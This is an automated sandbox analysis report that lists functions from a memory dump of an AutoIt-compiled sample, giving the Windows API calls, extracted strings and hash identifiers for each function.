                                                                      • Opcode Fuzzy Hash: 18cb2abcc48e4c245cc59fe9d363151cee6d7dcb3d8d4bc5ebd6aa2140b24571
                                                                      • Instruction Fuzzy Hash: B5311874E013099FDB18CFA9C991BDABBB5FF49300F14406AE915AB351D770AA41CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BE33A2
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BA3A04
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                      • String ID: Line:
                                                                      • API String ID: 2289894680-1585850449
                                                                      • Opcode ID: c64495955b08f14609caf973d27bace774528697eabd96c04c6c05abd62dd2d0
                                                                      • Instruction ID: bc1af932e88dc4e4eba3c59e283edf7264fb9ff1b7280e22c5e18049e9a22422
                                                                      • Opcode Fuzzy Hash: c64495955b08f14609caf973d27bace774528697eabd96c04c6c05abd62dd2d0
                                                                      • Instruction Fuzzy Hash: BB31D47140C304AEC725EB24DC46FEFB7E8AB42B10F0845AEF599930A1DB749648C7D6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C3327C
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C33287
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: e063a266226d33306fef1be75ab095430242b1787fadf854ff006d97a357c14e
                                                                      • Instruction ID: c45383a4a841630c55fe29535690acf7b1e41f85930f9f90d29e4fe7c52c8698
                                                                      • Opcode Fuzzy Hash: e063a266226d33306fef1be75ab095430242b1787fadf854ff006d97a357c14e
                                                                      • Instruction Fuzzy Hash: FE11C4717102487FFF259F54DC81FBB376AEB94364F104228F9289B292D6729E518B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0EF10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: HANDLE$PQ
                                                                      • API String ID: 176396367-2463900637
                                                                      • Opcode ID: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
                                                                      • Instruction ID: 26707f4d3df703617f6541cfa81e7813062bf454ea61e0834b956b7373f8082e
                                                                      • Opcode Fuzzy Hash: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
                                                                      • Instruction Fuzzy Hash: 791126B15501269BE718DF99D889BADB3A8DF80761F60486FE010CE0C4EB709F81C714
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C33710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA600E: CreateWindowExW.USER32 ref: 00BA604C
                                                                        • Part of subcall function 00BA600E: GetStockObject.GDI32(00000011), ref: 00BA6060
                                                                        • Part of subcall function 00BA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C3377A
                                                                      • GetSysColor.USER32 ref: 00C33794
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: 5353270f429e1674d2b0f128d1eeb527ef35d2c46b96210f32a9d6eae35d3b2e
                                                                      • Instruction ID: 9cbc42664de393e9b1be210ffab410747afeac5e34ce3c031ce44f521df7b483
                                                                      • Opcode Fuzzy Hash: 5353270f429e1674d2b0f128d1eeb527ef35d2c46b96210f32a9d6eae35d3b2e
                                                                      • Instruction Fuzzy Hash: 421129B2620209AFDF10DFA8CD46AEE7BB8EB09314F014514F965E2250D735E9519B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C1CD7D
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C1CDA6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: b079c6238524cdbacfacac2f809ce7d9fbddd66dfe078ee562d29eb5d8802666
                                                                      • Instruction ID: b8f18db571025650feec05b1fbc83d7d8e2be1e7cf3eb54a624f9f803c80dbaa
                                                                      • Opcode Fuzzy Hash: b079c6238524cdbacfacac2f809ce7d9fbddd66dfe078ee562d29eb5d8802666
                                                                      • Instruction Fuzzy Hash: 9F11E371281631BAD7345B669CC4FE7BE68EB137A4F004226F11992180D2609990E6F0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C33429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32 ref: 00C334AB
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C334BA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 192a17871c7fef428afafb6d11f707949065668db80bae8b5ba85f6f27a8dd0f
                                                                      • Instruction ID: cfa5176d2bbb5b593207d0392f45fb870b97d01f7c2784c3d8146737b76cc508
                                                                      • Opcode Fuzzy Hash: 192a17871c7fef428afafb6d11f707949065668db80bae8b5ba85f6f27a8dd0f
                                                                      • Instruction Fuzzy Hash: D8118F71120248ABEB224F64DC84BAB3B6AEB05374F504724F975A71E0C771DE919B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C06C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C06CB6
                                                                      • _wcslen.LIBCMT ref: 00C06CC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: STOP
                                                                      • API String ID: 1256254125-2411985666
                                                                      • Opcode ID: c9d6fec1bd8e287e72d9030ccefbc6da1886df53135bbf84d1457e114be23ac8
                                                                      • Instruction ID: 5bff93f2684dfd0b375782f5e4ce7977bcdfe2bced1647412741f179903a47f5
                                                                      • Opcode Fuzzy Hash: c9d6fec1bd8e287e72d9030ccefbc6da1886df53135bbf84d1457e114be23ac8
                                                                      • Instruction Fuzzy Hash: AE01D232A146368BDB20AFFDDC81ABF77F5EB61710B100529E862971D0EB31DA60C650
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C01D4C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: f7370b6b4b3f0e7381a4c0ec9ed2d2c038cb3578f7c182f881e50727d872d727
                                                                      • Instruction ID: 061ec5e997d9d1d7b9f20a900aae17b42b19778aae81aa6607840c1fc3d1dc49
                                                                      • Opcode Fuzzy Hash: f7370b6b4b3f0e7381a4c0ec9ed2d2c038cb3578f7c182f881e50727d872d727
                                                                      • Instruction Fuzzy Hash: 3701D471605228ABCB19EBA4CC51DFEB3A8EB473A0B180619FC32672C1EA305908D760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C01C46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 1ad00919a984cb54e9b217c676556d30a560769f7dcb75b6919ed9f88783d3e7
                                                                      • Instruction ID: f1ffbc064279bb18975db05bbdc6b1c308cfab6e3af4a49180d5f0c1df5c0162
                                                                      • Opcode Fuzzy Hash: 1ad00919a984cb54e9b217c676556d30a560769f7dcb75b6919ed9f88783d3e7
                                                                      • Instruction Fuzzy Hash: 7C01A77568510467DB18EB90C952AFFB7E8DB52380F140019B816772C1EA24DF48D6B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 3, 3, 16, 1
                                                                      • API String ID: 176396367-3042988571
                                                                      • Opcode ID: 7647b379bdf81c8e697a12c3ca45a3963484305817183a91d74d873492be5428
                                                                      • Instruction ID: c7b9243e2adfc6af99938ebea4e0ee49202cef8efdca019843c726be3936bd17
                                                                      • Opcode Fuzzy Hash: 7647b379bdf81c8e697a12c3ca45a3963484305817183a91d74d873492be5428
                                                                      • Instruction Fuzzy Hash: 3FE02B026043301492313279BCC1EBF56C9CFC5750710193FF981C2266EBE48F9193A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD1ABC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BDCE40: GetEnvironmentStringsW.KERNEL32 ref: 00BDCE44
                                                                      • _free.LIBCMT ref: 00BD1AFD
                                                                      • _free.LIBCMT ref: 00BD1B04
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentStrings
                                                                      • String ID: 8X
                                                                      • API String ID: 3523873077-771344844
                                                                      • Opcode ID: 229de4be6cf3a88769c205c14baae5e49541de67a547a4a38dd74de60ddaf7d2
                                                                      • Instruction ID: f4d1f2cc9c3b829daf1ce7b2466e4df2820c493058e317f7d2715cc8f2de603c
                                                                      • Opcode Fuzzy Hash: 229de4be6cf3a88769c205c14baae5e49541de67a547a4a38dd74de60ddaf7d2
                                                                      • Instruction Fuzzy Hash: EFE02B5360AA1161977272BF7C51B5E46C8ABD1330F6106E7F524D73C2FD64C8021295
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C00B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      • Opcode ID: 4819051df4b1ddf03a7c50dfa7eb9a30cd9a6f464e7c020b8c8037aec432ede2
                                                                      • Instruction ID: 6b7efd2867d24e7e0fc66eb5d9d9009adb9a2651acf4ae5d659d6d10c8588070
                                                                      • Opcode Fuzzy Hash: 4819051df4b1ddf03a7c50dfa7eb9a30cd9a6f464e7c020b8c8037aec432ede2
                                                                      • Instruction Fuzzy Hash: 84E0483125431927D21436547C43FED7BC49F05B61F21047AFB58655C38BD1655047A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BBF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BC0D71,?,?,?,00BA100A), ref: 00BBF7CE
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00BA100A), ref: 00BC0D75
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA100A), ref: 00BC0D84
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BC0D7F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 55579361-631824599
                                                                      • Opcode ID: 541eec3c3950a83c81ee5518417edf0fe9e4b95f159b90501e4ec7371066d90f
                                                                      • Instruction ID: 3f3d939859c9e541355aa851f0ef6552f2f7acc597836e14a7594ce26eb2f39e
                                                                      • Opcode Fuzzy Hash: 541eec3c3950a83c81ee5518417edf0fe9e4b95f159b90501e4ec7371066d90f
                                                                      • Instruction Fuzzy Hash: CDE06DB02203118BD730AFBDE84475A7BE0AB00740F0089BDE896C6661DBF5E4448BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BFD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime
                                                                      • String ID: %.3d$X64
                                                                      • API String ID: 481472006-1077770165
                                                                      • Opcode ID: 501e193ee9940360151444d70f1f187a586631cd98d19956c7087a0082a23585
                                                                      • Instruction ID: 39d7f991d3fa1c72ab7a9e2ec73536ded05fc7f78a6081a77cf8b06611b30a76
                                                                      • Opcode Fuzzy Hash: 501e193ee9940360151444d70f1f187a586631cd98d19956c7087a0082a23585
                                                                      • Instruction Fuzzy Hash: B7D0127180810DEACB5097D0CCC59FEB3FDAB08301F5084E2FA06A3040E624C50C6BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C32356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindWindowW.USER32 ref: 00C3236C
                                                                      • PostMessageW.USER32 ref: 00C32373
                                                                        • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
